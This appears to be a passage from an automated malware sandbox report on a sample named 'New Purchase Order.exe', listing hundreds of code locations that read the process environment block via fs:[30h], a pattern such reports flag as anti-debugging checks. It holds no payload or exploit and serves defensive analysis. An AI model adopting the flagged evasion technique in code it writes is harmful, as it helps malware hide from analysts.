            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A2C3 mov eax, dword ptr fs:[00000030h]8_2_0113A2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A2C3 mov eax, dword ptr fs:[00000030h]8_2_0113A2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A2C3 mov eax, dword ptr fs:[00000030h]8_2_0113A2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011402E1 mov eax, dword ptr fs:[00000030h]8_2_011402E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011402E1 mov eax, dword ptr fs:[00000030h]8_2_011402E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011402E1 mov eax, dword ptr fs:[00000030h]8_2_011402E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012062D6 mov eax, dword ptr fs:[00000030h]8_2_012062D6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C6500 mov eax, dword ptr fs:[00000030h]8_2_011C6500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E53E mov eax, dword ptr fs:[00000030h]8_2_0115E53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E53E mov eax, dword ptr fs:[00000030h]8_2_0115E53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E53E mov eax, dword ptr fs:[00000030h]8_2_0115E53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E53E mov eax, dword ptr fs:[00000030h]8_2_0115E53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E53E mov eax, dword ptr fs:[00000030h]8_2_0115E53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01138550 mov eax, dword ptr fs:[00000030h]8_2_01138550
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01138550 mov eax, dword ptr fs:[00000030h]8_2_01138550
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116656A mov eax, dword ptr fs:[00000030h]8_2_0116656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116656A mov eax, dword ptr fs:[00000030h]8_2_0116656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116656A mov eax, dword ptr fs:[00000030h]8_2_0116656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E59C mov eax, dword ptr fs:[00000030h]8_2_0116E59C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01132582 mov eax, dword ptr fs:[00000030h]8_2_01132582
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01132582 mov ecx, dword ptr fs:[00000030h]8_2_01132582
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01164588 mov eax, dword ptr fs:[00000030h]8_2_01164588
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011545B1 mov eax, dword ptr fs:[00000030h]8_2_011545B1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011545B1 mov eax, dword ptr fs:[00000030h]8_2_011545B1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B05A7 mov eax, dword ptr fs:[00000030h]8_2_011B05A7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B05A7 mov eax, dword ptr fs:[00000030h]8_2_011B05A7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B05A7 mov eax, dword ptr fs:[00000030h]8_2_011B05A7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011365D0 mov eax, dword ptr fs:[00000030h]8_2_011365D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A5D0 mov eax, dword ptr fs:[00000030h]8_2_0116A5D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A5D0 mov eax, dword ptr fs:[00000030h]8_2_0116A5D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E5CF mov eax, dword ptr fs:[00000030h]8_2_0116E5CF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E5CF mov eax, dword ptr fs:[00000030h]8_2_0116E5CF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E5E7 mov eax, dword ptr fs:[00000030h]8_2_0115E5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011325E0 mov eax, dword ptr fs:[00000030h]8_2_011325E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116C5ED mov eax, dword ptr fs:[00000030h]8_2_0116C5ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116C5ED mov eax, dword ptr fs:[00000030h]8_2_0116C5ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01168402 mov eax, dword ptr fs:[00000030h]8_2_01168402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01168402 mov eax, dword ptr fs:[00000030h]8_2_01168402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01168402 mov eax, dword ptr fs:[00000030h]8_2_01168402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E420 mov eax, dword ptr fs:[00000030h]8_2_0112E420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E420 mov eax, dword ptr fs:[00000030h]8_2_0112E420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E420 mov eax, dword ptr fs:[00000030h]8_2_0112E420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112C427 mov eax, dword ptr fs:[00000030h]8_2_0112C427
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6420 mov eax, dword ptr fs:[00000030h]8_2_011B6420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EA456 mov eax, dword ptr fs:[00000030h]8_2_011EA456
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112645D mov eax, dword ptr fs:[00000030h]8_2_0112645D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115245A mov eax, dword ptr fs:[00000030h]8_2_0115245A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]8_2_0116E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]8_2_0116E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]8_2_0116E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]8_2_0116E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]8_2_0116E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]8_2_0116E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]8_2_0116E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E443 mov eax, dword ptr fs:[00000030h]8_2_0116E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115A470 mov eax, dword ptr fs:[00000030h]8_2_0115A470
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115A470 mov eax, dword ptr fs:[00000030h]8_2_0115A470
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115A470 mov eax, dword ptr fs:[00000030h]8_2_0115A470
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BC460 mov ecx, dword ptr fs:[00000030h]8_2_011BC460
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EA49A mov eax, dword ptr fs:[00000030h]8_2_011EA49A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011644B0 mov ecx, dword ptr fs:[00000030h]8_2_011644B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BA4B0 mov eax, dword ptr fs:[00000030h]8_2_011BA4B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011364AB mov eax, dword ptr fs:[00000030h]8_2_011364AB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011304E5 mov ecx, dword ptr fs:[00000030h]8_2_011304E5
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01130710 mov eax, dword ptr fs:[00000030h]8_2_01130710
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01160710 mov eax, dword ptr fs:[00000030h]8_2_01160710
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116C700 mov eax, dword ptr fs:[00000030h]8_2_0116C700
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116273C mov eax, dword ptr fs:[00000030h]8_2_0116273C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116273C mov ecx, dword ptr fs:[00000030h]8_2_0116273C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116273C mov eax, dword ptr fs:[00000030h]8_2_0116273C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AC730 mov eax, dword ptr fs:[00000030h]8_2_011AC730
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116C720 mov eax, dword ptr fs:[00000030h]8_2_0116C720
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116C720 mov eax, dword ptr fs:[00000030h]8_2_0116C720
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01130750 mov eax, dword ptr fs:[00000030h]8_2_01130750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BE75D mov eax, dword ptr fs:[00000030h]8_2_011BE75D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172750 mov eax, dword ptr fs:[00000030h]8_2_01172750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172750 mov eax, dword ptr fs:[00000030h]8_2_01172750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B4755 mov eax, dword ptr fs:[00000030h]8_2_011B4755
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116674D mov esi, dword ptr fs:[00000030h]8_2_0116674D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116674D mov eax, dword ptr fs:[00000030h]8_2_0116674D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116674D mov eax, dword ptr fs:[00000030h]8_2_0116674D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01138770 mov eax, dword ptr fs:[00000030h]8_2_01138770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140770 mov eax, dword ptr fs:[00000030h]8_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D678E mov eax, dword ptr fs:[00000030h]8_2_011D678E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011307AF mov eax, dword ptr fs:[00000030h]8_2_011307AF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E47A0 mov eax, dword ptr fs:[00000030h]8_2_011E47A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113C7C0 mov eax, dword ptr fs:[00000030h]8_2_0113C7C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B07C3 mov eax, dword ptr fs:[00000030h]8_2_011B07C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011347FB mov eax, dword ptr fs:[00000030h]8_2_011347FB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011347FB mov eax, dword ptr fs:[00000030h]8_2_011347FB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011527ED mov eax, dword ptr fs:[00000030h]8_2_011527ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011527ED mov eax, dword ptr fs:[00000030h]8_2_011527ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011527ED mov eax, dword ptr fs:[00000030h]8_2_011527ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BE7E1 mov eax, dword ptr fs:[00000030h]8_2_011BE7E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172619 mov eax, dword ptr fs:[00000030h]8_2_01172619
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE609 mov eax, dword ptr fs:[00000030h]8_2_011AE609
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]8_2_0114260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]8_2_0114260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]8_2_0114260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]8_2_0114260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]8_2_0114260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]8_2_0114260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114260B mov eax, dword ptr fs:[00000030h]8_2_0114260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E627 mov eax, dword ptr fs:[00000030h]8_2_0114E627
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01166620 mov eax, dword ptr fs:[00000030h]8_2_01166620
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01168620 mov eax, dword ptr fs:[00000030h]8_2_01168620
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113262C mov eax, dword ptr fs:[00000030h]8_2_0113262C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114C640 mov eax, dword ptr fs:[00000030h]8_2_0114C640
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01162674 mov eax, dword ptr fs:[00000030h]8_2_01162674
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F866E mov eax, dword ptr fs:[00000030h]8_2_011F866E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F866E mov eax, dword ptr fs:[00000030h]8_2_011F866E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A660 mov eax, dword ptr fs:[00000030h]8_2_0116A660
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A660 mov eax, dword ptr fs:[00000030h]8_2_0116A660
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01134690 mov eax, dword ptr fs:[00000030h]8_2_01134690
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01134690 mov eax, dword ptr fs:[00000030h]8_2_01134690
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011666B0 mov eax, dword ptr fs:[00000030h]8_2_011666B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116C6A6 mov eax, dword ptr fs:[00000030h]8_2_0116C6A6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0116A6C7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A6C7 mov eax, dword ptr fs:[00000030h]8_2_0116A6C7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE6F2 mov eax, dword ptr fs:[00000030h]8_2_011AE6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE6F2 mov eax, dword ptr fs:[00000030h]8_2_011AE6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE6F2 mov eax, dword ptr fs:[00000030h]8_2_011AE6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE6F2 mov eax, dword ptr fs:[00000030h]8_2_011AE6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B06F1 mov eax, dword ptr fs:[00000030h]8_2_011B06F1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B06F1 mov eax, dword ptr fs:[00000030h]8_2_011B06F1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BC912 mov eax, dword ptr fs:[00000030h]8_2_011BC912
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01128918 mov eax, dword ptr fs:[00000030h]8_2_01128918
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01128918 mov eax, dword ptr fs:[00000030h]8_2_01128918
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE908 mov eax, dword ptr fs:[00000030h]8_2_011AE908
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AE908 mov eax, dword ptr fs:[00000030h]8_2_011AE908
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B892A mov eax, dword ptr fs:[00000030h]8_2_011B892A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C892B mov eax, dword ptr fs:[00000030h]8_2_011C892B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B0946 mov eax, dword ptr fs:[00000030h]8_2_011B0946
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204940 mov eax, dword ptr fs:[00000030h]8_2_01204940
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D4978 mov eax, dword ptr fs:[00000030h]8_2_011D4978
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D4978 mov eax, dword ptr fs:[00000030h]8_2_011D4978
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BC97C mov eax, dword ptr fs:[00000030h]8_2_011BC97C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01156962 mov eax, dword ptr fs:[00000030h]8_2_01156962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01156962 mov eax, dword ptr fs:[00000030h]8_2_01156962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01156962 mov eax, dword ptr fs:[00000030h]8_2_01156962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0117096E mov eax, dword ptr fs:[00000030h]8_2_0117096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0117096E mov edx, dword ptr fs:[00000030h]8_2_0117096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0117096E mov eax, dword ptr fs:[00000030h]8_2_0117096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B89B3 mov esi, dword ptr fs:[00000030h]8_2_011B89B3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B89B3 mov eax, dword ptr fs:[00000030h]8_2_011B89B3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B89B3 mov eax, dword ptr fs:[00000030h]8_2_011B89B3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A0 mov eax, dword ptr fs:[00000030h]8_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011309AD mov eax, dword ptr fs:[00000030h]8_2_011309AD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011309AD mov eax, dword ptr fs:[00000030h]8_2_011309AD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]8_2_0113A9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]8_2_0113A9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]8_2_0113A9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]8_2_0113A9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]8_2_0113A9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A9D0 mov eax, dword ptr fs:[00000030h]8_2_0113A9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011649D0 mov eax, dword ptr fs:[00000030h]8_2_011649D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FA9D3 mov eax, dword ptr fs:[00000030h]8_2_011FA9D3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C69C0 mov eax, dword ptr fs:[00000030h]8_2_011C69C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011629F9 mov eax, dword ptr fs:[00000030h]8_2_011629F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011629F9 mov eax, dword ptr fs:[00000030h]8_2_011629F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BE9E0 mov eax, dword ptr fs:[00000030h]8_2_011BE9E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BC810 mov eax, dword ptr fs:[00000030h]8_2_011BC810
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01152835 mov eax, dword ptr fs:[00000030h]8_2_01152835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01152835 mov eax, dword ptr fs:[00000030h]8_2_01152835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01152835 mov eax, dword ptr fs:[00000030h]8_2_01152835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01152835 mov ecx, dword ptr fs:[00000030h]8_2_01152835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01152835 mov eax, dword ptr fs:[00000030h]8_2_01152835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01152835 mov eax, dword ptr fs:[00000030h]8_2_01152835
